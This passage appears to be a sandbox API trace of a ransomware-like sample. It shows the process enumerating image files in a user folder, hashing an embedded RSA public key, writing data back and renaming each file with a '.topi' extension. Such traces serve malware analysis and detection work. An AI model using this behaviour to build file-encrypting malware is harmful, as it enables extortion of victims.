(in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0096.730] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.730] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0096.730] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0x13c63, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0x13c63, lpOverlapped=0x0) returned 1 [0096.731] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0096.731] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x13c68, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.731] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0096.731] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0096.731] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.731] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0096.731] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0096.731] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0096.731] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0096.731] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.731] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0096.731] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0096.731] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0096.731] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0096.732] CloseHandle (hObject=0x6a8) returned 1 [0096.741] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b41c0 [0096.741] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x890) returned 0x31cf750 [0096.741] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b41c0 | out: hHeap=0x680000) returned 1 [0096.741] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IK1V\\DuNu8NvReY7SRV2A.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ik1v\\dunu8nvrey7srv2a.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IK1V\\DuNu8NvReY7SRV2A.png.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ik1v\\dunu8nvrey7srv2a.png.topi")) returned 1 [0096.742] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.742] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.742] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.743] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4258 | out: hHeap=0x680000) returned 1 [0096.743] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4fa98630, ftCreationTime.dwHighDateTime=0x1d5bde8, ftLastAccessTime.dwLowDateTime=0x7f830ce0, ftLastAccessTime.dwHighDateTime=0x1d5be25, ftLastWriteTime.dwLowDateTime=0x7f830ce0, ftLastWriteTime.dwHighDateTime=0x1d5be25, nFileSizeHigh=0x0, nFileSizeLow=0x3b0c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mHMnR9Yutgwrux.bmp", cAlternateFileName="MHMNR9~1.BMP")) returned 1 [0096.743] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.743] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8e) returned 0x31b4258 [0096.743] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.743] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IK1V\\mHMnR9Yutgwrux.bmp") returned=".bmp" [0096.744] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IK1V\\mHMnR9Yutgwrux.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ik1v\\mhmnr9yutgwrux.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0096.744] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=15116) returned 1 [0096.744] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0096.747] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x3ae6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.747] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0096.748] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.748] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.748] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.748] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x3b0c, lpOverlapped=0x0) returned 1 [0096.748] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.748] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0096.748] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.748] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.748] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df228) returned 1 [0096.749] CryptCreateHash (in: hProv=0x6df228, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0096.749] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0096.749] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0096.749] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0096.749] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0096.749] GetLastError () returned 0x0 [0096.750] CryptDestroyHash (hHash=0x31c7580) returned 1 [0096.750] CryptReleaseContext (hProv=0x6df228, dwFlags=0x0) returned 1 [0096.750] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.750] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0096.750] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0096.750] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.750] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0096.750] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.750] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.750] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x3b10) returned 0x99f92d8 [0096.750] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0096.750] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.750] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0096.750] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.750] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0096.750] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0096.750] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02c60 [0096.750] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4ac0 [0096.750] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02ca8 [0096.750] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4ad8 [0096.750] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4b08 [0096.750] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0096.750] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4b20 [0096.750] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0096.751] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0096.751] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0096.751] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0096.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4b08 | out: hHeap=0x680000) returned 1 [0096.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4b20 | out: hHeap=0x680000) returned 1 [0096.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0096.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0096.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0096.751] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0096.751] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0096.751] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4b20 [0096.751] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0096.751] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e4b08 [0096.751] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0096.751] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0096.751] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0096.751] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0096.751] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0096.751] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0096.751] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0096.751] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0096.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4b20 | out: hHeap=0x680000) returned 1 [0096.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4b08 | out: hHeap=0x680000) returned 1 [0096.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0096.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0096.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.752] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0096.752] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.752] GetCurrentThreadId () returned 0x8c4 [0096.752] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0096.752] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f8610 [0096.752] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0096.752] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df228 [0096.752] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0096.752] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0096.752] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.752] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0096.752] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.752] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.752] GetCurrentThreadId () returned 0x8c4 [0096.752] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.752] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.752] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0096.752] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.752] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.752] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.752] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.752] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0096.753] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0096.753] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.753] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0096.753] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0096.753] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0096.753] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.753] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0096.753] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.753] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.753] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0096.753] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0096.753] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0096.753] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0096.753] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0096.753] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.753] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4b08 [0096.753] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0096.753] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0096.753] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.753] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.753] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0096.754] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0096.754] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0096.754] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4b20 [0096.754] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0096.754] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0096.754] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0096.754] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4af0 [0096.754] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0096.754] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0096.754] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.754] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IK1V\\mHMnR9Yutgwrux.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ik1v\\mhmnr9yutgwrux.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IK1V\\mHMnR9Yutgwrux.bmp.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ik1v\\mhmnr9yutgwrux.bmp.topi")) returned 1 [0096.755] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.755] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.755] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.757] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4258 | out: hHeap=0x680000) returned 1 [0096.757] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e7e9e80, ftCreationTime.dwHighDateTime=0x1d5b77d, ftLastAccessTime.dwLowDateTime=0xf0d825a0, ftLastAccessTime.dwHighDateTime=0x1d5c515, ftLastWriteTime.dwLowDateTime=0xf0d825a0, ftLastWriteTime.dwHighDateTime=0x1d5c515, nFileSizeHigh=0x0, nFileSizeLow=0xe3f3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WhGX7YXsk.png", cAlternateFileName="WHGX7Y~1.PNG")) returned 1 [0096.757] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IK1V\\WhGX7YXsk.png") returned=".png" [0096.757] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IK1V\\WhGX7YXsk.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ik1v\\whgx7yxsk.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0096.757] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=58355) returned 1 [0096.757] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0096.760] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xe3cd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.760] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0096.762] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df228) returned 1 [0096.762] CryptCreateHash (in: hProv=0x6df228, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0096.763] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0096.763] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0096.763] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0096.763] GetLastError () returned 0x0 [0096.763] CryptDestroyHash (hHash=0x31c7580) returned 1 [0096.763] CryptReleaseContext (hProv=0x6df228, dwFlags=0x0) returned 1 [0096.763] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.763] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0096.763] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0096.763] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.763] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0096.763] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.763] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.763] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xe3f0) returned 0x9a06a00 [0096.763] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0096.763] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.764] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0096.764] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.764] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 